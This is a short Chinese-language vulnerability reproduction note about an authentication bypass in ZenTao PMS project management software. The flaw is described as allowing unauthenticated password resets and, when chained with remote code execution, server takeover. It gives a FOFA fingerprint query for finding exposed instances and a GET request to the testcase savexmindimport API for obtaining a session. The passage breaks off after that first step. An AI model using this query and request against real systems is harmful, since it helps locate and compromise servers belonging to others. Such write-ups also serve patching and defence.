0x01 产品简介
ZenTao PMS 是一款国产的开源项目管理软件,实现了软件的完整生命周期的全面覆盖。
0x02 漏洞概述
ZenTao PMS 存在身份认证绕过漏洞,攻击者可在无需登陆的情况下利用该漏洞调用相关API功能重制密码等,并结合其他后台远程代码执行漏洞执行代码,控制服务器。
0x03 测绘语句
fofa: icon_hash="53755730"
0x04 漏洞复现
1、获取session:GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID={
{random_str}}&branch={
{random_str}} HTTP/1.1